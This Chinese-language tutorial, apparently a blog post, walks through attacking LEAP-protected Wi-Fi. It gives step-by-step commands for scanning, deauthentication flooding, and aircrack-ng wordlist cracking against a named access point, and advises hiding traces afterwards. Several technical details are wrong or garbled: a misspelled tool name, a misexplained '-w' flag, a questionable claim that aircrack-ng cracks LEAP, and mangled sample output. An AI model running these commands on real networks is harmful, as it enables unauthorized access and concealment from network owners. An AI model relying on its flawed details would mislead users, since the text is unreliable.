📜  对LEAP加密的WLAN进行渗透测试(1)

📅  最后修改于: 2023-12-03 15:39:09.347000             🧑  作者: Mango

对LEAP加密的WLAN进行渗透测试

LEAP(Lightweight Extensible Authentication Protocol)是一种不再推荐使用的WLAN安全协议,其加密使用了MS-CHAPv2协议,可以被黑客轻易地破解。因此,对LEAP加密的WLAN进行渗透测试十分必要。

渗透测试步骤
  1. 收集信息:获取目标WLAN的ESSID(即网络名称)、MAC地址、接入点型号、加密类型等信息。
  2. 扫描:使用工具对周围网络进行扫描,确定目标网络的SSID并获取关键信息。
  3. 破解:使用工具对目标网络进行破解,找出口令及弱点。
  4. 渗透:成功破解后,利用口令及弱点进行进一步渗透。
  5. 隐藏:清理所有痕迹,并隐藏自己在系统中的存在。
工具
  1. Aircrack-ng:用于破解WLAN加密密码;
  2. Kismet:用于探测隐藏的无线网络;
  3. Wireshark:用于抓取网络数据包;
  4. Nmap:用于扫描目标网络的主机和端口;
  5. Metasploit:用于漏洞利用和渗透测试。
操作示例
步骤1:收集信息
$ sudo iwlist wlan0 scan | grep -E 'ESSID|Address|Quality|Encryption'

输出结果如下:

ESSID:"Your WiFi"  
  Address: 9C:4E:20:D4:31:F4 (Tenda Technology)  
22/70  Quality=32/70  Signal level=-78 dBm  
          Encryption key:on

这里输出的信息包括网络名(ESSID)、MAC地址和加密方式等。

步骤2:扫描
$ sudo kismet

运行Kismet,可以扫描到更加详细的无线网络信息。如果目标网络被隐藏,可以使用如下命令探测:

$ sudo airodump-ng -c 6 --bssid 9C:4E:20:D4:31:F4 wlan0

这里的“-c”参数表示信道号,“--bssid”参数表示接入点MAC地址,“wlan0”代表网卡名称。

步骤3:破解

使用Aircrack-ng破解LEAP加密的WLAN密码:

$ sudo airmon-ng start wlan0
$ sudo airplay-ng --fakeauth 60 -a 9C:4E:20:D4:31:F4 wlan0mon
$ sudo airodump-ng --bssid 9C:4E:20:D4:31:F4 -c 6 -w capture wlan0mon
$ sudo aireplay-ng -0 0 -a 9C:4E:20:D4:31:F4 wlan0mon
$ sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 9C:4E:20:D4:31:F4 capture-01.cap

这里的“--fakeauth”参数表示欺骗接入点进行认证,“-w”参数表示输出密码到指定文件中。

步骤4:渗透

成功获取口令后,还需要利用口令及弱点进行进一步渗透。

步骤5:隐藏

清理所有痕迹,并隐藏自己在系统中的存在,避免被发现。

小结

对LEAP加密的WLAN进行渗透测试需要多轮扫描、探测、分析和攻击,而且需要使用多个工具进行协同作业。对于专业的渗透测试人员来说,这是一项日复一日研究和精进的技能。